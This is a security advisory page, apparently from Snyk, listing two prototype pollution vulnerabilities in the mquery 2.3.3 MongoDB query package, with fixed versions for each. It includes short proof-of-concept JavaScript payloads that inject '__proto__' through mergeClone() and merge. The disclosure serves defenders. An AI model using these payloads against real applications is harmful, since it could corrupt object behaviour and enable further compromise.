mquery 2.3.3 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the mquery package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
H Prototype Pollution mquery is an Expressive query building for MongoDB Affected versions of this package are vulnerable to Prototype Pollution via the `mergeClone()` function. PoC by zhou, peng `mquery = require('mquery'); var malicious_payload = '{"__proto__":{"polluted":"HACKED"}}'; console.log('Before:', {}.polluted); // undefined mquery.utils.mergeClone({}, JSON.parse(malicious_payload)); console.log('After:', {}.polluted); // HACKED` How to fix Prototype Pollution? Upgrade `mquery` to version 3.2.5 or higher.	<3.2.5
H Prototype Pollution mquery is an Expressive query building for MongoDB Affected versions of this package are vulnerable to Prototype Pollution via the `merge` function within `lib/utils.js`. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program. PoC `require('./env').getCollection(function(err, collection) { assert.ifError(err); col = collection; done(); }); var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable"}}'); var m = mquery(payload); console.log({}.polluted); // The empty object {} will have a property called polluted which will print vulnerable` How to fix Prototype Pollution? Upgrade `mquery` to version 3.2.3 or higher.	<3.2.3

Vulnerability

Vulnerable Version

Prototype Pollution

mquery is an Expressive query building for MongoDB

Affected versions of this package are vulnerable to Prototype Pollution via the mergeClone() function.

PoC by zhou, peng

mquery = require('mquery');
var malicious_payload = '{"__proto__":{"polluted":"HACKED"}}';
console.log('Before:', {}.polluted); // undefined
mquery.utils.mergeClone({}, JSON.parse(malicious_payload));
console.log('After:', {}.polluted); // HACKED

How to fix Prototype Pollution?

Upgrade mquery to version 3.2.5 or higher.

<3.2.5

Prototype Pollution

mquery is an Expressive query building for MongoDB

Affected versions of this package are vulnerable to Prototype Pollution via the merge function within lib/utils.js. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.

PoC

   require('./env').getCollection(function(err, collection) {
      assert.ifError(err);
      col = collection;
      done();
    });
    var payload = JSON.parse('{"__proto__": {"polluted": "vulnerable"}}');
    var m = mquery(payload);
    console.log({}.polluted);
// The empty object {} will have a property called polluted which will print vulnerable

How to fix Prototype Pollution?

Upgrade mquery to version 3.2.3 or higher.

<3.2.3

mquery@2.3.3 vulnerabilities

Expressive query building for MongoDB

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically

PoC by zhou, peng

PoC